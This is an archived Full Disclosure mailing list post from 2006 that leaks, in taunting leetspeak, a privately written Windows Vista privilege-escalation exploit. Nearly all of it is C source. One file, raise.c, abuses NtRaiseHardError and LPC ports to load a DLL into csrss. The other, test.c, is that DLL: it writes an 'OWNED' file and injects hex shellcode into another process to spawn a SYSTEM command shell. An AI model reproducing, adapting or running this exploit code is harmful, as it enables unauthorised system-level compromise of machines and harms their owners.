Full Disclosure mailing list archives
LOL VISTA EXPL0IT WAREZ LOL
From: <soundoftheunderground () hush com>
Date: Sun, 31 Dec 2006 16:55:59 -0600
-+- 0D4Y XCL00S1V3 -+- D0n7 0P3N T1LL XM4S -+- 0D4Y XCL00S1V3 -+- Introducing The Latest In Purloin3d Pr1v4t3 Pr0gg13z, Sn4tch3d S3kr1t Sh3llc0d3z & F1lch3d Furt1v3 F1l3z All new private^H^H^H^H^H^H^Hpublic exploit for a well known Vista hole. We warmly acknowledge erasmus for his generous and noble and unintentioned donation. Regrettably we award NO points for style but maximum points for effort and fair marks for dependability and timeliness. May Providence guide this happy coder to continue to ignore women and find comfort in his ugly, ugly, code. +++ //raise.c //26-12-2006 ]erasmus[/ORC //exploit NtRaiseHardError privesc and load dll into csrss //this version only is vista, other version can be worked //with proper offsets, i will complete them soon //imperfect but sometime work, ok for proto type;) //dll limit to 8 chars but maybe can work around by //\xxx\..\dll type trick and use LoadLibraryW, now is //C:\TEST but another drive maybe work #define offs1 0x30 #define offs2 0xBBD0 #include "windows.h" #include "stdio.h" DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD, PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID, PDWORD); DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID, DWORD,PDWORD); DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*, DWORD,PDWORD); HANDLE hl; HANDLE hs; DWORD sb; LPVOID lpc(LPCWSTR w){//cesar trick WORD n[4]; SECURITY_QUALITY_OF_SERVICE q; LPVOID p; DWORD d; DWORD c[6],s[3]; BYTE b[0x28]; n[0]=n[1]=wcslen(w)*2; *(PDWORD)(n+2)=(DWORD)w; memset(&q,0,sizeof(q)); q.Length=sizeof(q); p=NULL; d=0x1000; memset(&c,0,sizeof(c)); c[0]=sizeof(c); memset(&s,0,sizeof(s)); s[0]=sizeof(s); memset(&b,0,sizeof(b)); b[1]=1; hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL, PAGE_READWRITE,0,d,NULL); if(!hs)return NULL; p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); if(!p)return NULL; c[1]=(DWORD)hs; c[3]=d; c[4]=(DWORD)p; d=sizeof(b); if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d)) return NULL; sb=c[5]; return p; } HANDLE e1,e11; DWORD WINAPI tp1(LPVOID a){ LPVOID p[7]; DWORD d; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0x1B001AE; p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; p[5]=(LPVOID)0x100010; p[6]=L"erasmus1"; while(1){ WaitForSingleObject(e1,INFINITE); NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e11); } return 0; } DWORD aaa,bbb; HANDLE e2,e22; DWORD WINAPI tp2(LPVOID a){ BYTE b[0xD8]; LPVOID p[7]; DWORD d; memset(&b,0,sizeof(b)); *(PDWORD)(b+0x3C)=2; *(PDWORD)(b+0x48)=1; *(PDWORD)(b+0x4C)=1; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0xD600D6; p[4]=&b; p[5]=(LPVOID)0x100010; p[6]=L"erasmus2"; while(1){ WaitForSingleObject(e2,INFINITE); memcpy(&b,"C:\\TEST",8); *(PDWORD)(b+0x08)=aaa; *(PDWORD)(b+0x0C)=bbb; *(PDWORD)(b+0x70)=aaa+0x100; *(PDWORD)(b+0x74)=aaa+0x100; NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e22); } return 0; } STARTUPINFO cps; PROCESS_INFORMATION cpi; void w(DWORD a,DWORD d){ HWND h; aaa=d; bbb=a; SetEvent(e1); do{h=FindWindow(NULL,"erasmus1");}while(!h); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); SetEvent(e2); do{h=FindWindow(NULL,"erasmus2");}while(!h); TerminateThread(cpi.hThread,0); Sleep(100); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); } int main(int c,char**v){ char sd[MAX_PATH]; char dp[MAX_PATH]; WCHAR pp[MAX_PATH]; WCHAR pn[MAX_PATH]; HMODULE nt,kr,ad; DWORD se,cs,ws,u,d,h; HANDLE t; LPBYTE sc; GetSystemDirectory(sd,sizeof(sd)); sprintf(dp,"%s\\csrsrv.dll",sd); cs=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\winsrv.dll",sd); ws=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\ntdll.dll",sd); nt=LoadLibrary(dp); sprintf(dp,"%s\\kernel32.dll",sd); kr=LoadLibrary(dp); sprintf(dp,"%s\\advapi32.dll",sd); ad=LoadLibrary(dp); *(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort"); *(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt, "NtQueryInformationProcess"); *(LPVOID*)&NtRaiseHardError=GetProcAddress(nt, "NtRaiseHardError"); if(2==c){ d=atoi(v[1]); if(!d){ printf("no args need\n"); return -1; } t=OpenProcess(PROCESS_ALL_ACCESS,0,d); if(!t){ printf("no args need\n"); return -1; } __asm mov eax,fs:[0x18] __asm mov eax,[eax+0x30] __asm mov eax,[eax+0x1D4] __asm mov se,eax if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se); else swprintf(pp,L"\\Windows"); swprintf(pn,L"%s\\ApiPort",pp); sc=(LPBYTE)lpc(pn); swprintf(pn,L"%s\\SbApiPort",pp); if(!sc)sc=(LPBYTE)lpc(pn); if(!sc)return -1; h=0; DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2); WriteProcessMemory(t,&hs,&h,4,&d); WriteProcessMemory(t,&sb,&sb,4,&d); Sleep(INFINITE); }else{ STARTUPINFO cps; PROCESS_INFORMATION cpi; hs=sc=NULL; sb=0; memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId()); if(!CreateProcess(NULL,sd,NULL,NULL,0, CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps, &cpi)){ printf("spawn fail\n"); return -1; } Sleep(3000); if(!hs){ printf("lpc fail\n"); return -1; } sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); } memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; e1=CreateEvent(NULL,0,0,NULL); e11=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp1,NULL,0,NULL); e2=CreateEvent(NULL,0,0,NULL); e22=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp2,NULL,0,NULL); u=cs+offs2; *(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA"); w(u,sb); Sleep(INFINITE); return 0; } //test.c //26-12-2006 ]erasmus[/ORC //dll for load in csrss by raise.c //repair csrss and create OWNED.TXT and try create system cmd //i can exec shell code in lpc shared section but LoadLibrary //is for work around of DEP on vista //also imperfect but also is proto type! //offsets is for vista #define offs1 0x5F89 #define offs2 0xBBD0 #define offs3 0xBBFC #define offs4 0x3F0CC #include "windows.h" LONG WINAPI uef(LPEXCEPTION_POINTERS a){ Sleep(INFINITE); return 0; } DWORD WINAPI tp(LPVOID a){ HMODULE kr,ws; BYTE b[0x100]; DWORD c,d; HANDLE h,t; kr=GetModuleHandle("kernel32"); ws=GetModuleHandle("winsrv"); h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4)); c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),MEM_COMMIT,PAGE_EXE CUTE_READWRITE); d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69); memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x 50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x 66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x 50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x 00\x00\x00\x00\x83\xC4\x58\xC3",73); *(LPDWORD)(b+65)=d; WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b),&d); t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL ,0,NULL); WaitForSingleObject(t,INFINITE); return 0; } BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){ DWORD cs,d; LPDWORD p,f,l; HANDLE h; if(DLL_PROCESS_ATTACH==dwReason){ SetUnhandledExceptionFilter(uef); h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL, CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL); WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL); CloseHandle(h); cs=(DWORD)GetModuleHandle("csrsrv"); *(LPDWORD)(cs+offs2)=0; __asm mov eax,esp __asm mov p,eax while(1){ if(cs+offs1==*p){ *p=(DWORD)ExitThread; d=p[1]+8; break; } p=p+1; } p=*(LPDWORD*)(cs+offs3)+2; f=p; while(d!=f[0])f=*(LPDWORD*)f; l=p; while(d!=l[1])l=*(LPDWORD*)(l+1); *(LPDWORD*)f=l; *(LPDWORD*)(l+1)=f; for(d=0;d<100;d=d+1){ p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8); memset(p,0,0xD8); p[2]=(DWORD)p+0x08; p[3]=(DWORD)p+0x08; p[4]=(DWORD)p+0x10; p[5]=(DWORD)p+0x10; p[13]=0x240000; p[15]=1; p[16]=1; p[28]=(DWORD)p+0x78; p[29]=(DWORD)p+0x80; } p=(LPDWORD)GetProcessHeap(); while(1){ p=p+1; if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&& !strcmp(*(LPSTR*)(p+1),"CSRSS")){ d=p[1]+6; while(1){ p=p-1; if(d-(DWORD)p==*p)break; } break; } } *(LPDWORD*)(cs+offs2)=p; Sleep(0); CreateThread(NULL,0,tp,NULL,0,NULL); } return TRUE; } Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- LOL VISTA EXPL0IT WAREZ LOL soundoftheunderground (Dec 31)